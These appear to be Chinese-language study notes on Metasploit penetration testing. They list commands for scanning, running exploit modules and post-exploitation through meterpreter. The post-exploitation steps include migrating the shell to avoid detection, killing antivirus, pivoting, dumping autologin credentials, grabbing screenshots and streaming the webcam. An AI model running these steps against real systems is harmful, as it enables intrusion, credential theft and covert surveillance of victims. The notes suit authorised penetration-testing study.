MSF渗透测试大致步骤:
1.扫描目标系统,寻找可用漏洞
2.选择并配置一个漏洞利用模块
3.选择并配置一个攻击载荷
4.选择一个编码技术,用来绕过杀毒软件
5.渗透攻击
1.使用辅助模块进行端口扫描
search portsacn
use xxxxx
show options
设置必须的属性值(set PORTS 1-10000,....)
2.使用辅助模块进行服务 扫描
搜索扫描模块:search scanner
使用Nmap进行扫描:
绕过防火墙进行扫扫描主机系统
nmap -Pn -O 192.168.0.110
3.漏洞利用
通过观察打开的端口以及服务及版本搜索对应的漏洞利用模块(以samba服务为例)
search samba
对于漏洞利用列表,排前面的漏洞利用成功几率较高
查看漏洞利用信息:info exploit/xxxxx
使用该漏洞利用:use exploit/xxxxx
查看攻击载荷:show payloads
设置payload:set PAYLOAD cmd/unix/xxx
show options
设置必须属性(设置攻击机ip,被攻击机ip,端口...)
run
4.shell后利用
MSf发动攻击之后会获取目标主机的shell
在使用MSf获取的shell不够稳定,需要把它与目标系统的一个稳定进程绑定在一起,这样既不用对磁盘进行写入操作,也不容易被发现
查看目标系统的进程:ps
查看当前shell的进程号(984):getpid
将shell的进程迁移到稳定的进程中(448):migrate 448
再次查看当前shell进程(进程以及发生转移):getpid
(如果原进程984没有自动关闭使用自动迁移进程命令 run post/windows/manage/migrate)
查看目标机系统信息: sysinfo/systeminfo
检查目标是否运行在虚拟机:run post/windows/gather/checkvm
检查目标机是否在运行:idletime
查看路由信息:route
当要控制多个会话时候使用background命令把当前会话放到后台,getuid命令查找以及控制的机器
关闭目标杀毒软件: run post/windows/manage/killav
启动目标机的远程桌面协助(3389):
run post/windows/manage/ebable_rdp
查看目标机本地子网情况:
run post/windows/manage/autoroute
将meterpreter隐藏在后台,添加路由并进行查看
background
route add 192.168.172.0 255.255.255.0 1
route print
借助被攻陷的主机对其他网络进行攻击:
列举有多少用户登录了目标机器:
run post/windows/gather/enum_logged_on_users
列举目标机上安装了那些程序:
run post/windows/gather/enum_applications
抓取自动登录用户账号密码:
run windows/gather/credentials/windows_autologin
若未抓取到,则使用Espia扩展插件;先输入load espia命令加载插件;
然后输入screengrab可以抓取目标机的屏幕截图,图片保存在root目录下
load espia
screengrab/screenshot
查看目标有没有摄像头,并打开拍照(保存在root目录下)
wencam_list
webcam_snap
摄像头监控:webcam_stream
访问:file://root/KzIDymVy.html
查看目标机处于哪个目录: pwd/getwd(本地)
列出当前目录中的所有文件: ls
切换目录: cd c:\
pwd
搜索c盘中所有的.txt文件:
search -f *.txt -d c:\
下载目标机文件到本地:
download c:\test.txt /root
长传文件到目标机:
upload /root/test.txt c:/
纵向提权:低权限用户到高权限用户
横向提权:同级别A角色的权限到B角色权限
进入目标机命令行: shell
查看目标权限: whoami /groups
查看以及获得的权限: getuid
尝试 getsystem 命令提权(一般会失败)
查看系统整体以及补丁情况:systeminfo
也可以用 Wmic 写出补丁情况:
Wmic qfe get Caption,Description,HotFixID,InstalledOn
对相应系统未打补丁情况寻找对于exp提权
background命令将会话放到后台,search 对应的exp利用设置好之后run
getuid查看是否提权成功